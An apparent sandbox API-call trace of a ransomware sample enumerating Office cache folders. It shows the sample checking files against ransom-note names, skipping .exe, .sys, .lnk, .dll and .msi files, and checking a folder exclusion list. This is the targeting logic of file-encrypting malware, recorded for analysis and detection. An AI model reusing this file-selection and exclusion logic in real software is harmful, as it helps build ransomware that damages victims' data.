[0107.610] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.610] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.610] PathFindExtensionW (pszPath="InfoPathMUI.msi") returned=".msi" [0107.610] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.610] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.610] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.610] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.610] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.610] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0107.610] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2=".") returned 1 [0107.610] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="..") returned 1 [0107.610] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.610] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.610] PathFindExtensionW (pszPath="InfoPathMUI.xml") returned=".xml" [0107.610] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.610] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.610] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.610] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.610] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4370 [0107.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.611] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.611] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.611] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.611] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.611] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.611] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.611] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.611] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.611] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.611] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.611] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4418 [0107.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.611] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.675] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.686] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0107.686] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.686] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.686] lstrlenW (lpString="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 40 [0107.686] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.686] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.687] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.687] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0107.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.687] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.687] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.687] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.688] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.688] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.688] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.688] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.688] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.688] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.688] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.689] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.689] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.689] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.689] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.689] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.689] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.689] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.689] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.689] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a44c0 [0107.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.689] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0107.689] lstrcmpW (lpString1="VisioLR.cab", lpString2=".") returned 1 [0107.689] lstrcmpW (lpString1="VisioLR.cab", lpString2="..") returned 1 [0107.689] lstrcmpiW (lpString1="VisioLR.cab", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.689] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.689] PathFindExtensionW (pszPath="VisioLR.cab") returned=".cab" [0107.689] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.689] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.689] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.690] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.690] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.690] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4568 [0107.690] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.690] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0107.690] lstrcmpW (lpString1="VisioMUI.msi", lpString2=".") returned 1 [0107.690] lstrcmpW (lpString1="VisioMUI.msi", lpString2="..") returned 1 [0107.690] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.690] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.690] PathFindExtensionW (pszPath="VisioMUI.msi") returned=".msi" [0107.690] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.690] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.690] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.690] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.690] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.690] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0107.690] lstrcmpW (lpString1="VisioMUI.xml", lpString2=".") returned 1 [0107.690] lstrcmpW (lpString1="VisioMUI.xml", lpString2="..") returned 1 [0107.690] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.691] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.691] PathFindExtensionW (pszPath="VisioMUI.xml") returned=".xml" [0107.691] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.691] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.691] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.691] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.691] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.691] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.691] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.691] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.691] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a4610 [0107.691] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.691] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0107.691] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.691] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0107.691] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.691] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.691] lstrlenW (lpString="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 40 [0107.691] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0107.691] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.692] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.692] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\" [0107.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.692] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758d88 [0107.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.724] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.810] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0107.810] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2=".") returned 1 [0107.810] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="..") returned 1 [0107.810] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.810] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.810] PathFindExtensionW (pszPath="OneNoteMUI.msi") returned=".msi" [0107.810] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.810] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.810] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.810] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.810] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.811] FindNextFileW (in: hFindFile=0x758d88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0107.811] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2=".") returned 1 [0107.811] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="..") returned 1 [0107.811] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.811] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.811] PathFindExtensionW (pszPath="OneNoteMUI.xml") returned=".xml" [0107.811] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.811] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.811] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.811] 